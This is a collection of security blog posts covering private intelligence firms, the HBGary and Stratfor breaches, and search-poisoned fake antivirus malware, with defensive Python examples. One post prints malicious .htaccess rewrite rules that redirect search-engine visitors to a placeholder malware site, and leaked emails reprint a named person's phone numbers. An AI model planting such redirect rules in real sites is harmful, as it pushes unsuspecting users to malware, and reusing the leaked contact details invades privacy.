World Cities Summit 2014 and XRVision

Yaacov Apelbaum - World Cities Summit 2014 Logo

First day of the WCS—against all odds and after two months of grueling development work, an impossible deadline, and 15 hour days—we delivered and deployed the world’s first standalone, wearable face recognition system.

It is my humble hope that this small contribution of ours will help to make our cities, communities, and public gatherings safer.

Yaacov Apelbaum - XRVision Face Recognition System

© Copyright 2014 Yaacov Apelbaum All Rights Reserved.

Cyber Security Poetry

Cyber Beatnik Poetry

Tokens of Distrust
It was on a starless March night,
The spear phishers went out for a bite.

Through a zero day vulnerability,
They breached RSA’s network security.

A Trojan attached to an email transmission,
Gave the attackers remote access permission. 

Deep into the corporate systems they dove, 
Collecting the SecurID key seeds treasure trove.

The theft affected over forty million tokens,
Transparency failed and trust was broken.

A few weeks followed and on a moonless May night,
The spear phishers returned with a renewed appetite.

Over the internet via secure VPN and a forged key,
They breached Lockheed’s defenses and Pwned their IP.


Ties That Bind
Identity, how do I bind thee to an object? Let me recount the ways. 
One, by a secret.
Two, by a token.
Three, by your essence.
Four, by space and time.


Risk Appetite
A little shiftless fella named Phil,
Landed a CISO gig through a shady deal. 

Clueless about cyber security threats,
He managed his way upwards like a rat.

Pen tests and remediation took a back seat,
To what the cafeteria was serving to eat.


When the company was finally breached by a hack,
He said “C’est la vie! The insurance will cover our back.”

On Privatizing Intelligence Gathering

Yaacov Apelbaum - F18 Instrument Panel Facebook Twitter and YouTube

Much has been said about the military’s effort to incorporate social media platforms into its arsenal of weapons.

Over the past two years, there have been several detailed reports claiming that the armed forces are engaging in large scale social media manipulation initiatives. In his article, “Military’s ‘persona’ software cost millions, used for ‘classified social media activities’”, Stephen Webster provides details about a contract issued by the USAF to develop software that will allow it to create, manage, and operate an army of sock puppets worldwide. In a different article, “US Military Caught Manipulating Social Media, Running Mass Propaganda Accounts”, Anthony Gucciardi describes how this is done.

The fact that the military is using SN manipulation tools to fight the war is laudable. It’s about time they started using non-conventional solutions to carry the war into the back-alley Internet cafes where virtual battlefields of radicalization are raging.

The national defense agencies, which are among the most technical and professional organizations out there, are self-conscious about the pros and cons of dabbling with SN. The USAF social media guide illustrates these concerns. It offers a detailed analysis and operational recommendations for engaging in SN activity. For example, the global media information flow is shown through the following diagram:

Yaacov Apelbaum - USAF social media Distribution

In another section, the “guidelines to assist Airmen in engaging online conversations” offers a list of the following dos and don’ts:

No Classified Info
Do not post classified or sensitive information (for example, troop movement, force size, weapons details, etc.). If in doubt, talk to your supervisor or security manager.

Replace Error with fact Not Argument
When you see misrepresentations made about the Air Force in social media, you may certainly use your blog, theirs, or someone else’s to point out the error. Always do so with respect and with the facts. When you speak to someone with an adversarial position, make sure that what you say is factual and is not disparaging. Avoid arguments.

Admit Mistakes
Be the first to respond to your own mistakes. If you make an error, be up front about your mistake and correct it quickly. If you choose to modify an earlier post, make it clear that you have done so (such as by using the strikethrough function).

Use Your Best Judgment
Remember there are always consequences to what you write. If you’re still unsure, and the post is about the Air Force, discuss your proposed post with your supervisor. Ultimately, however, you have sole responsibility for what you choose to post to your blog.

Avoid The Offensive
Do not post any defamatory, libelous, vulgar, obscene, abusive, profane, threatening, racially and ethnically hateful, or otherwise offensive or illegal information or material.

Avoid Copyright
Do not post any information or other material protected by copyright without the permission of the copyright owner. Also, consider using a Creative Commons license to protect your own work (see http://creativecommons.org for details).

Trademarks - Don’t Breach
Do not use any words, logos or other marks that would infringe upon the trademark, service mark, certification mark, or other intellectual property rights of the owners of such marks without the permission of such owners.

Don’t Violate Privacy
Do not post any information that would infringe upon the proprietary, privacy or personal rights of others.

Avoid Endorsements
Do not use the Air Force name to endorse or promote products, opinions or causes.

No Impersonations
Do not forge or otherwise manipulate identifiers in your post in an attempt to disguise, impersonate or otherwise misrepresent your identity or affiliation with any other person or entity.

Use Disclaimers
Identify to readers of a personal social media site or post that the views you express are yours alone and that they do not necessarily reflect the views of the Air Force. Use a disclaimer such as: “The postings on this site are my own and don’t necessarily represent Air Force positions, strategies or opinions.”

Stay In Your Lane
Discussing issues related to your AFSC or personal experiences is acceptable but do not discuss areas of expertise for which you have no background or knowledge.

Considering the fact that SN bridges numerous EULA and jurisdictional boundaries, it’s likely that these tools will end up violating some privacy laws. But with that having been said, I also have the utmost faith in the military’s ability to regulate and control itself. Between the office of the inspector general, the Uniform Code of Military Justice, and the clear constitutional limitations imposed on the military’s ability to operate on US soil, I think that there are enough checks and balances to prevent wide-scale domestic Orwellian style abuse of this technology.

So, what seems to be the problem? Well, the biggest issue is that parts of the SM intelligence collection, monitoring, and analysis are no longer being carried out by the military or the three-letter government agencies. Rather, they are being conducted by a horde of private intelligence firms. Some of these include: Palantir, Stratfor, HBGary Federal, Berico Technologies, Endgame Systems, and Booz Allen Hamilton, which recently gained notoriety thanks to Edward Snowden’s mega leaks.

A better insight into the functioning of this rent-an-intelligence world of shadows can be gleaned from the hack by LulzSec. In 2010, the group successfully breached the private intelligence firm HBGary/HBGary Federal. The hack captured over 75,000 e-mails. It revealed the close cooperation between large commercial firms such as Bank of America and various government agencies. For example, it showed that BoA solicited the Department of Justice for help regarding possible disclosure by WikiLeaks. The Department of Justice then referred BoA to the political lobby firm Hunton and Williams, which in turn connected the bank with a group of information security ‘fixers’ known as Team Themis.

Team Themis—a group made up of HBGary Federal and the intelligence firms Palantir Technologies (named after Saruman’s seeing stone in J. R. R. Tolkien’s Lord of the Rings), Berico Technologies, and Endgame Systems—was consulted regarding ways to destroy the credibility of WikiLeaks and Glenn Greenwald, a Salon.com reporter who wrote favorably about WikiLeaks. The strategy sought to “sabotage or discredit the opposing organization” and even included a plan to submit fake leaked documents and then call out the error.

Interestingly, some of the leaked documents contained Palantir’s and HBGary’s PowerPoint decks and e-mails which detailed various Machiavellian schemes. A notable example was the strategy for destroying the credibility of Glenn Greenwald.

Yaacov Apelbaum - Palantir presentation about Glenn Greenwald 1

Yaacov Apelbaum - Palantir presentation about Glenn Greenwald 2

Yaacov Apelbaum - Palantir and WikiLeaks

Even more troubling were plans to use malicious software to hack into computers owned by the opponents and their families. The e-mails show a proposal to develop and use “custom malware” and “zero day” exploits to gain control of a target’s computer network in order to snoop their files, delete content, monitor keystrokes, and manipulate websites.

Yaacov Apelbaum - HBGary Exploit Development Services

In one e-mail, 27-year-old Matthew Steckman, a Palantir employee who was central to the Themis operations, boasted:

We are the best money can buy! Damn it feels good to be a gangsta.

It turns out that Palantir, in addition to living the “gangsta” lifestyle to the fullest, was also shooting ‘sideways’ at its competitors by allegedly misappropriating IP by fraudulent means and conducting domestic industrial espionage.

The bizarre story revolves around Shyam Sankar, Palantir’s Director of Forward Deployed Engineering, who allegedly represented himself as a principal of SRS Enterprises, a straw company registered in Florida under the names of his parents. Through it, he and his brother allegedly obtained i2’s competing software solutions by fraudulent means and used them to design Palantir’s products.

Yaacov Apelbaum i2 Palantir lawsuit
Image 1: i2 Civil Action Against Palantir


Yaacov Apelbaum- S R S Enterprises Llc

Image 2: Company registration Details for SRS


Shyam Sankar 
Image 3: Shyam Sankar

Yaacov Apelbaum - Shyam Sankar Palantir

I don’t know if any of these allegations are true because the case was settled just before going to trial, but if even some of the details are correct, this is the stuff that spy novels are made of.

I’m not sure what I find more outrageous in this case: Palantir’s complete disregard for the law or their nonchalant gangster attitude.

I have no problem rationalizing the military’s proposal to carefully use software like MetalGear to conduct “classified blogging activities on foreign-language Web sites to enable CENTCOM to counter violent extremist and enemy propaganda outside the U.S.”, but Palantir and HBGary were proposing to use such technologies wholesale on US soil for subversive (and most likely illegal) corporate and financial gain.

Several months after the attack against HBGary Federal, Anonymous hacked into another private intelligence firm Stratfor. They released a stash of about five million e-mails which provided deep insight into how the private security/intelligence companies view themselves vis-a-vis government agencies like the C.I.A. and F.B.I.

In one e-mail to his employees, Stratfor’s chairman arrogantly dismisses the C.I.A.’s capabilities. He writes:

From: George Friedman [mailto:gfriedman@stratfor.com]
Sent: Wednesday, December 29, 2004 9:13 AM
To: analysts@stratfor.com; exec@stratfor.com
Subject: CIA head of analysis fired

Jamie Miscik, Deputy Director of Intelligence at the CIA was fired today. As
DDI, she ran the analytic shop. According to media reports, she was fired
for squandering resources on day to day reports while ignoring the broad
trends. In other words, she was fired for looking at the trees and being
unable to see the forest. She was also accused of spending too much time
updating policy makers and too little time trying to grasp the broad
trends–giving customers what they wanted instead of what they needed. In
the end, it was her customers that turned on her.
My charge against her was and remains that she took no pride in her craft
and turned intelligence into PR and shoddy process. She and her gang are now
history.

This gives Stratfor an enormous, historic opportunity. The CIA model of
analysis has been invalidated. The ponderous, process driven machine that
could only manage the small things now needs to be replaced by a robust,
visionary, courageous analytic system. Stratfor has the opportunity to show
the way. In fact, we are showing the way. Everyone in Langley knows that we
do things they have never been able to do with a small fraction of their
resources. They have always asked how we did it. We can now show them and
maybe they can learn.

Reading this statement makes you wonder how the C.I.A. has ever managed all of these years without Stratfor’s robust, visionary, and courageous guidance.

Stratfor also illustrated its ability to collect deep intelligence by performing private surveillance on US soil of protesters in the Occupy Austin movement. To achieve this, one of their agents went undercover and joined an Occupy Austin meeting in order to gain insight into how the group operated.

Yet another e-mail reveals their ability to gain access to secret government documents. Fred Burton, the Stratfor vice president for Intelligence, told one corporate client: “The F.B.I. has a classified investigation [that may be of interest and]…I’ll see what I can uncover.” In a similar e-mail, he claims to have access to top secret materials captured during the raid on the OBL [Osama Bin Laden] compound and goes as far as offering a Q&A session regarding its content:

From: Fred Burton
To: Secure List
Subject: OBL take — quick response needed
Sent: May 12, 2011 15:25

I can get access to the materials seized from the OBL safe house.
What are the top (not 45) questions we want addressed?

Sean Noonan
Tactical Analyst
Office: +1 512-279-9479
Mobile: +1 512-758-5967
Strategic Forecasting, Inc.
www.stratfor.com

Now, I could understand if Stratfor was offering supplementary intel to various government agencies, but the ironic implication here is that they are siphoning classified information from the government and handing it over to their corporate clients.

Indeed, as Morpheus stated, “Fate, it seems, is not without its sense of irony”: Stratfor, the organization that prided itself on teaching the C.I.A. a thing or two about security and intelligence gathering, got Pwnd through the most benign means.

When you read the details of the Stratfor and HBGary exploits, you can’t help but scratch your head in amazement. For example:

HBGary’s website fell to a simple SQL injection. The site neither scrubbed nor sanitized its requests, which allowed the attackers to quickly retrieve the site’s user IDs and passwords.

With a user ID and password in their possession, they downloaded the entire user database. Next, they proceeded to crack it. Had the password database been properly protected, they would have gotten nowhere, but again, poor security design enabled them to retrieve all the passwords. It turns out that the HBGary Federal database stored passwords as plain MD5 hashes. To reverse them, the attackers used readily available rainbow tables.

After getting the passwords of two of HBGary’s executives, Aaron Barr and Ted Vera, they discovered that the passwords consisted of only eight characters: six lower-case letters and two numbers. With the user ID and password details of the two executives, the attackers found out that this pair reused their passwords in multiple applications, including: e-mail accounts, LinkedIn (see below), Twitter and a customer-facing server. So now Anonymous was able to access their e-mails too.
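As an added illustration of the password-storage failure described above (example code written for this page, not HBGary’s or anyone else’s actual code), the following Python contrasts unsalted MD5 records with salted, iterated PBKDF2 records and shows what a precomputed digest table recovers from each; the account names, passwords and candidate list are constructed.

```python
"""Contrast unsalted MD5 password records with salted, iterated PBKDF2 records."""
import hashlib
import hmac
import secrets

# Constructed sample accounts. The password shape (six lowercase letters plus two
# digits) mirrors what the post describes; the values themselves are made up.
SAMPLE_USERS = {"user1": "qwerty12", "user2": "qwerty12"}
CANDIDATES = ["letmein", "qwerty12", "hunter2"]  # stand-in for a cracking wordlist


def legacy_md5_record(password):
    """The weak scheme: bare MD5, so equal passwords yield equal, precomputable digests."""
    return hashlib.md5(password.encode()).hexdigest()


def hardened_record(password, iterations=200_000):
    """Per-user random salt plus iterated PBKDF2-HMAC-SHA256, packed into one string."""
    salt = secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_hardened(password, record):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, dk_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def precomputed_lookup(candidates):
    """Tiny stand-in for a rainbow table: digest -> password, built once, reused forever."""
    return {legacy_md5_record(p): p for p in candidates}


def compare_schemes(users, candidates, iterations=1000):
    """Store the same accounts both ways and see what a precomputed table recovers.

    iterations is kept low here only so the demo runs quickly; use the default
    of hardened_record (or higher) in production.
    """
    table = precomputed_lookup(candidates)
    legacy = {u: legacy_md5_record(p) for u, p in users.items()}
    hardened = {u: hardened_record(p, iterations) for u, p in users.items()}
    return {
        # two users, one password: one digest under MD5, two records under PBKDF2
        "distinct_legacy_digests": len(set(legacy.values())),
        "distinct_hardened_records": len(set(hardened.values())),
        # the table recovers every legacy password instantly ...
        "legacy_recovered": {u: table.get(d) for u, d in legacy.items()},
        # ... and nothing from the salted records (the salt defeats precomputation)
        "hardened_recovered": {u: table.get(r.split("$")[-1]) for u, r in hardened.items()},
        # legitimate logins still work against the hardened records
        "hardened_verifies": all(verify_hardened(p, hardened[u]) for u, p in users.items()),
    }


if __name__ == "__main__":
    for key, value in compare_schemes(SAMPLE_USERS, CANDIDATES).items():
        print(f"{key}: {value}")
```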

Yaacov Apelbaum - HBGary's Aaron Barr Hacked Linkedin
Image 4: Aaron Barr’s 2013 defaced LinkedIn page

Yaacov Apelbaum - HBGary's Aaron Barr Hacked Linkedin-After
Image 5: Aaron Barr’s 2014 updated LinkedIn pages (note the stripped personal details and the recommendation by Pulkit Kapila, from Booz Allen Hamilton)

Aaron Barr LinkedIn Page 2018
Image 6: Aaron Barr’s 2018 LinkedIn page

The accounts on the support server belonged to ordinary users, but the system wasn’t patched against a privilege escalation attack. Now, with administrative access and due to the fact that one of the executives was also the administrator of the entire e-mail system, Anonymous gained full control of all HBGary Federal e-mail accounts. Using this vulnerability, they gained access to the account of another executive, Greg Hoglund, where they found an e-mail containing the root password for the entire site.

Anonymous had a root password, but couldn’t access the site server from outside of the firewall. They needed to login as a standard user and then switch to root.

To achieve this, they utilized a simple social engineering exploit. Using Greg Hoglund’s account, they contacted an administrator who had root access to the server. Through an e-mail exchange, they said that they had a problem logging in to the server and convinced the root admin to reset Greg’s password and also reveal his username, the two pieces of information they needed to complete their exploit and gain access to the Stratfor list of customers and their credit card files, which interestingly enough, were kept in a plain text file.

This wasn’t unique to HBGary or Stratfor. In all hacking cases involving private security or intelligence companies, the analysis of the attack shows that it was executed via the most rudimentary methods. No mission impossible scenarios took place; the root cause was just your common, run of the mill information security negligence and incompetence.

Time and time again, these von Wallenstein style wannabe spies have proven themselves to be a legal and an ethical liability. Case in point is that regardless of their patriotic pitch and public assertions of lofty ideals such as “solve the most important problems for the world’s most important institutions”, most of these individuals and companies are bottom feeders who are in it just for a fistful of dollars and narcissistic bragging rights. From the various e-mails disclosed, it’s obvious that they have no qualms conducting criminal influence operations against their customers’ political opponents and their families on US soil.

Aaron Barr, the man with a thousand faces
Image 6: Aaron Barr as a Secret Service Agent and other personas

The complete lack of moral scruples from guns for hire, like Aaron Barr, who engaged in the worst type of for-pay defamation doesn’t seem to change with time. Barr—after scrubbing his on-line persona several times—resurfaces in 2015 as a progressive, environmentally friendly activist this time dedicated to promoting Russian collusion theories, climate change awareness, and bemoaning the loss of on-line privacy.

Aaron Barr Promoting Russian Collusion
Image 7: Aaron Barr the champion of transparency and a crusader against Wikileaks

Regardless of how attractive privatizing national security may seem at the moment, ultimately national intelligence should be managed by military and career civil servants that should report to elected officials who in turn should have specific term limits. True, this may not be the best way; after all, J Edgar Hoover managed to abuse the process throughout the terms of six different presidents. But in the end, the system does self-correct. It has been doing that now for over two hundred years.

© Copyright 2013 Yaacov Apelbaum. All Rights Reserved.

The Anti-Virus Virus Part II

Yaacov Apelbaum-ER Anti-Virus Virus

In the Anti-Virus Virus, I described how certain commercially produced malware propagates via specialty web sites that have been SEO’d to rank at the top of search engine results.

In this posting I will try to identify who is responsible for the malware authorship, its marketing and its distribution.

As a quick refresher: the malware (a variety of bogus anti-virus applications) is downloaded when you click on a link in a page returned by a search engine. The redirect to the malicious download only occurs when a user arrives at the site by way of the search engine. At the heart of this exploit are legitimate websites that have been compromised to provide a redirect to the rogue downloads.

This exploit is interesting because in order for it to work, it requires the user to visit the site indirectly.  If you navigate to the site via a bookmark or manually enter the address it will not result in a redirect. This clever aspect of the tactic reduces the chance that the site’s owner will suspect that there is something wrong with his site and thus delay its patching. Site administrators visiting their site directly will not see any evidence of the redirect. However, traffic coming from search engines, (which forms the majority of visits) will keep getting redirected to the malware download.

The underlying technique of such an attack is a modification of the .htaccess file (found on the Apache web server). In some cases this file is replaced completely. In others, it is just modified to include some new rules. The modified .htaccess files will contain settings similar to the following:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mroodsn.*$ [NC,OR]
RewriteRule .* http://malewaresite-omitted/ [R=301,L]

This basically means: redirect any users who arrive from Google, Yahoo, or MSN to “malewaresite”. In some cases, common error pages are also redirected by the .htaccess file, like in the following:

ErrorDocument 404 http://malewaresite-omitted/

The result of this re-route is that unsuspecting users get sent to sites pushing malware.

The root cause in most of these cracks is poor user access controls which result in compromised file and folder permissions on shared hosting servers. This allows compromised accounts on the same physical server to overwrite the .htaccess files in otherwise unrelated sites.
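As an added example (not code from the original post), a small Python audit that flags the two patterns described above, a RewriteRule redirecting off-site behind search-engine Referer conditions and an ErrorDocument pointing off-site; the .htaccess sample and the host name malwaresite.example are constructed.

```python
"""Audit an .htaccess file for referrer-gated and off-site redirects."""
from urllib.parse import urlparse

# Constructed sample modelled on the rewrite rules quoted in the post; the target
# host (malwaresite.example) is a placeholder, not a real indicator.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC]
RewriteRule .* http://malwaresite.example/ [R=301,L]
ErrorDocument 404 http://malwaresite.example/
ErrorDocument 403 /errors/403.html
"""

# Substrings that usually mean "condition on arriving from a search engine".
SEARCH_ENGINE_HINTS = ("google", "yahoo", "msn", "bing", "ask", "aol")


def is_external(target, own_hosts):
    """True if target is an absolute http(s) URL whose host is not one of ours."""
    u = urlparse(target)
    return u.scheme in ("http", "https") and u.hostname not in own_hosts


def audit_htaccess(text, own_hosts):
    """Return (line_no, reason) findings for referrer-gated or off-site redirects.

    own_hosts: set of host names the site legitimately redirects to.
    """
    findings = []
    referer_conds = []  # lines of search-engine RewriteConds since the last rule
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            # Only conditions that test the Referer header matter for this trick.
            if "%{HTTP_REFERER}" in parts[1].upper():
                pattern = parts[2].lower()
                if any(hint in pattern for hint in SEARCH_ENGINE_HINTS):
                    referer_conds.append(n)
        elif directive == "rewriterule" and len(parts) >= 3:
            target = parts[2]
            if is_external(target, own_hosts):
                if referer_conds:
                    findings.append((n, f"redirect to {target} gated on search-engine "
                                        f"referrer (conditions at lines {referer_conds})"))
                else:
                    findings.append((n, f"redirect to external host {target}"))
            referer_conds = []  # conditions apply only to the next RewriteRule
        elif directive == "errordocument" and len(parts) >= 3:
            target = parts[2]
            if is_external(target, own_hosts):
                findings.append((n, f"ErrorDocument {parts[1]} points off-site to {target}"))
    return findings


if __name__ == "__main__":
    for line_no, reason in audit_htaccess(SAMPLE_HTACCESS, {"www.example.org"}):
        print(f"line {line_no}: {reason}")
```

Run it against every .htaccess under the document root of a shared host; a direct visit by the site owner will never trigger the rule, so the file itself is the only place the redirect shows.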

Source and Authorship
I loaded Process Monitor and installed the copy of Antivirus2010 on a quarantined Microsoft Virtual PC running Microsoft XP Professional. The installation created an entire registry hive that included several autoruns, browser search redirects, and a rootkit. I then fired up TCPView and examined the application’s outgoing communication. It didn’t take long before the malware opened a socket to a homing beacon and a list of staging and configuration servers, all of which were located in Russia (Moscow and Kiev). The domains associated with the servers were registered by Bakasoftware.com, which is currently hosted in Canada.

Interestingly, upon startup, the malware called the GetKeyboardLayout API and checked for the presence of the following keyboard layouts:

  • Russia
  • Czech Republic
  • Ukraine
  • Belarus
  • Estonia
  • Latvia
  • Lithuania

If it found one, it terminated itself, further evidence that the designers targeted English-speaking users. The analysis of the binaries also confirmed that they were compiled and linked using Russian regional settings.

Marketing and Distribution
For software to be commercially viable, it must have effective marketing and distribution channels. The bogus Antivirus is no exception. It turns out that even a few US companies have been associated with the distribution of this software. Several of them have been named as defendants in the Federal Trade Commission’s complaint. Some of these include Innovative Marketing, Inc., a US company registered in Belize, and ByteHosting Internet Services, LLC of Ohio, in addition to other American distributors including James Reno, Sam Jain, Daniel Sundin, Marc D’Souza, and Kristy Ross.

The Federal Trade Commission argued that the defendants have used complex online advertising techniques that violate the fair trade law in order to push a large number of fake security or system maintenance products including “WinFixer, WinAntivirus, DriveCleaner, WinAntispyware, ErrorProtector, ErrorSafe, SystemDoctor, AdvancedCleaner, Antivirus XP, and Antivirus 2008, 2009, 2010”.

We can gain a better glimpse into a typical malware distribution operation by examining the profile of Jain Shaileshkumar, a.k.a. Sam Jain. Mr. Jain is an internet entrepreneur and former CEO of the affiliate marketing network eFront. In 2005 he was ordered to pay $3.1 million to Symantec for selling counterfeit software and violating various IP laws. Jain operated several Internet-based companies including Discount Bob, Shifting Currents Financials, Inc., Innovative Marketing, Inc., Professional Management Consulting Inc., and Shopenter.com, LLC.

In December 2008, Jain was listed as a defendant in the Federal Trade Commission’s case against so-called “Scareware” applications such as WinFixer. The case alleges that several companies scammed consumers into buying these applications through malware and banner ads. According to court records, as of February 11, 2009, Jain is officially listed as a fugitive from justice in the United States.

Affiliate Program

The affiliate program is made up of a network of associates. Once a member like Sam Jain is accepted into the program, he is given access to an enterprise control panel that permits him to distribute different flavors of malware, along with a number of techniques for infecting internet-connected computers. Affiliates can make between 58 and 90 percent commission on sales of the software. Such generous commissions explain why these types of malware products are so popular among spammers.

Yaacov Apelbaum-Bakasoftware Control Panel 
Image 1: Bakasoftware Malware Administrative Download Control Panel

In a true testament to their feature richness, the affiliate members have access to a sophisticated web-based statistics dashboard. In it, the franchise owner can view KPIs that include: number of daily installs, number of purchases by victim (and his CC number), refunds (chargebacks), and commissions. With such access to real-time sales analytics, they can be the envy of many Fortune 500 sales organizations.

Yaacov Apelbaum-Bakasoftware Sales Dashboard  
Table 1: Bakasoftware Malware Sales Dashboard

As you can see from Table 1, one affiliate installed 154,825 editions of the software in 10 days and managed to get 2,772 of those to buy the cure. Any commission sales rep will tell you that a 2% conversion rate is very low, but with such a high commission structure, the affiliate was able to earn $146,525.25. A projection of this earning rate would generate over 5.5 million dollars a year.

That’s some pocket change. Who says that crime doesn’t pay?

© Copyright 2011 Yaacov Apelbaum All Rights Reserved.

The Anti-Virus Virus

Yaacov Apelbaum-Anti-Virus Virus

Several weeks ago, my wife was searching online for the words to one of Shel Silverstein’s poems.  With the Internet within closer reach than the bookshelf in our den, she went to Google and typed in the key words “shel silverstein pancakes,”  and within 0.32 seconds got several matching results (Image 1).

Yaacov Apelbaum-Search Results Page

Image 1: Google Search Results

She clicked on one of the top results on the first search page and almost instantly got prompted by a message box (Image 2) indicating something to the effect that her computer contained various signs of viruses and immediately needed to be examined.  It then offered an option to perform a security scan.

Yaacov Apelbaum-Virus Message 1

Image 2: Infection Warning

We keep our OS well patched and the anti malware software up to date, so she decided to decline the offer and clicked on the cancel button.  The message box went away but then another screen popped up telling her that her system was being scanned for viruses.  Thinking that she may have clicked the OK button instead by mistake, she waited for the scan results.

Yaacov Apelbaum-Virus Scan

Image 3: Infection Warning

When the scan was complete (within 15 seconds or so), she was informed that her computer indeed had been infected with several nasty viruses (Image 3) and that she would need to download and install the offered security program in order to remove these viruses (Image 4).

Yaacov Apelbaum-Virus Download

Image 4: Malware Download Dialog Box

At that point, she realized that the malware itself was communicating with her and trying to install itself on her machine. She clicked the Cancel button in the dialog box, but instead of terminating the installation, she was taken back to the first message box, which told her again that her computer contained various signs of viruses and needed to be examined. Essentially, she was trapped in a loop, unable to close the browser. After another round of scans and cancelations, she decided to bring up the Task Manager and terminate the process from there.

Several days later during dinner, she happened to mention her run-in with the malware and I made a sly comment that these are the rewards we reap for hanging around dubious websites.  She took offense. “Dubious web sites?” she said, mocking me, “this was the fourth entry on the first search results page of Google. How ‘dubious’ can that be?”

I found it hard to believe that the writers of the malware were clever enough to sneak by the Google filters and make it to the top of the first search results page. I executed the same search she had done just the day before. My search results were almost identical, but ironically her malware link had by then moved a step upwards in relevance.

Instead of clicking on the link I copied its URL and went directly to the website (Image 5)

Yaacov Apelbaum-Derkeiler.com-3

Image 5: Actual page with download link and keywords

The web site turned out to be a newsgroup called derkeiler.com, which is one of the most popular and most heavily advertised mailing list archives on the net. Looking closer at the page, I found the following:

  1. At the top was the bold title “SHEL SILVERSTEIN”
  2. Below the title was a bogus poster name in the format of name@xxxxxxxxx.com
  3. Next was a link which activated the malware download script.
  4. Finally at the bottom of the page was an extensive list of hundreds of keywords that were associated with the works of Shel Silverstein.

I looked at the parent directory page and found a long list of dated directories (Image 6).

Yaacov Apelbaum-Derkeiler.com-1

Image 6: Parent Directory (note heavy commercial advertising)

Each one of these directories contained dozens of linked entries. After randomly clicking on about 30 links, I determined that most of them were identical to the Shel Silverstein page (Image 5) in terms of content, layout and malware activation functionality.  I checked out several other public newsgroups and “personal” web sites to compare. It appeared as if indeed there was a method to this madness.

Yaacov Apelbaum-Derkeiler.com-2
Image 6: Sample directory contents with links to malware download

So what does it all mean? Well, the modus operandi seems to be as follows:

  1. The creators of the malware install the program on a large number of personal websites (some have been breached and others are dedicated). One example is Rosuto Samurai, which was allegedly created to support fantasy gaming but in reality never had any content besides the malware.
  2. They then proceed to automatically create hundreds of highly popular topic pages (i.e.  Ipod, Shel Silverstein, movies, etc.) in newsgroups and mailing lists, each of which contains a link to the malware download website.
  3. Each of the pages also includes a large list of keywords (generated by some machine learning process) that are associated with the topic.  The purpose of the keyword list is to increase the radar signature for the search engine spiders.
  4. The search engines find these individual topic pages, traverse the keyword list and algorithmically determine that all the words are related.  They also see the hyperlinks and postings on each page (which makes them appear like miniature websites) and as a result assign them a top rating—which to the user, translates as top hits in topic search results.

The outcome of this strategy is cheap and effective SEO penetration and viral dissemination of viral content (no pun intended) via top search results.
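The pattern described above (a bold topic title, a bogus poster in the form name@xxxxxxxxx.com, a single download link, and then hundreds of keywords with no sentence structure) lends itself to a simple page-level heuristic. The following detector is an added example written for this post, not code from derkeiler.com or from the malware; the two sample pages and the thresholds are constructed for illustration.

```python
import re
from dataclasses import dataclass

# Constructed sample inputs (not copies of any real derkeiler.com page): one page
# built the way the post describes the poisoned ones, and an ordinary list message.
KEYWORD_BLOCK = " ".join(f"silverstein keyword{i}" for i in range(150))  # 300 words
POISONED_PAGE = (
    "SHEL SILVERSTEIN\n"
    "From: name@xxxxxxxxx.com\n"
    "Download the collection here: http://example.invalid/get.php?id=7\n"
    + KEYWORD_BLOCK + "\n"
)
LEGIT_POST = (
    "Re: favourite Silverstein poem?\n"
    "From: alice@example.invalid\n"
    "I still think The Giving Tree holds up. The illustrations are sparse, but\n"
    "that is the point. Has anyone read Falling Up to their kids? Mine loved it.\n"
    "See http://example.invalid/list/archive for the earlier thread.\n"
)

URL_RE = re.compile(r"https?://\S+")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w.-]+")
# Poster addresses in the name@xxxxxxxxx.com pattern: a run of x's where a domain should be.
BOGUS_POSTER_RE = re.compile(r"@x{5,}\.", re.I)
WORD_RE = re.compile(r"[A-Za-z0-9']+")
SENTENCE_BREAK_RE = re.compile(r"[.!?;:,]")

# Thresholds are assumptions tuned for the samples above, not values from the post.
MIN_KEYWORD_RUN = 100    # words in a row with no sentence punctuation at all
MIN_KEYWORD_RATIO = 0.5  # share of the whole page that such a run accounts for


@dataclass
class Verdict:
    bogus_poster: bool
    link_count: int
    longest_unpunctuated_run: int
    keyword_ratio: float
    suspicious: bool


def longest_unpunctuated_run(text: str) -> int:
    """Length in words of the longest stretch with no sentence punctuation.

    Human prose breaks every dozen words or so; a machine-generated keyword
    list runs for hundreds of words without a single period or comma.
    """
    return max(len(WORD_RE.findall(chunk)) for chunk in SENTENCE_BREAK_RE.split(text))


def analyze_page(page: str) -> Verdict:
    links = URL_RE.findall(page)
    bogus_poster = BOGUS_POSTER_RE.search(page) is not None
    # Strip URLs and addresses first so their dots do not count as sentence breaks.
    body = EMAIL_RE.sub(" ", URL_RE.sub(" ", page))
    total_words = len(WORD_RE.findall(body))
    run = longest_unpunctuated_run(body)
    ratio = run / total_words if total_words else 0.0
    keyword_stuffed = run >= MIN_KEYWORD_RUN and ratio >= MIN_KEYWORD_RATIO
    return Verdict(bogus_poster, len(links), run, round(ratio, 3),
                   bogus_poster or keyword_stuffed)


if __name__ == "__main__":
    for name, page in (("poisoned", POISONED_PAGE), ("legit", LEGIT_POST)):
        print(name, analyze_page(page))
```

Either signal alone (the placeholder poster domain, or a long unpunctuated keyword block that dominates the page) is enough to mark a page for review; a crawler or mail-archive moderator can run the same check over a whole directory listing.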

Another interesting observation, not without its irony, is that large vendors such as Microsoft are completely unaware of this practice and are aggressively purchasing advertising space on these sites (including ads for their security products). Clearly, this is being done without the realization that they are actually sharing living space with some of the most aggressive malware distribution centers.

Stay tuned, in a future posting, we will dive deeper to see who is actually developing and marketing this malware.

Quis Custodiet Ipsos Custodes?


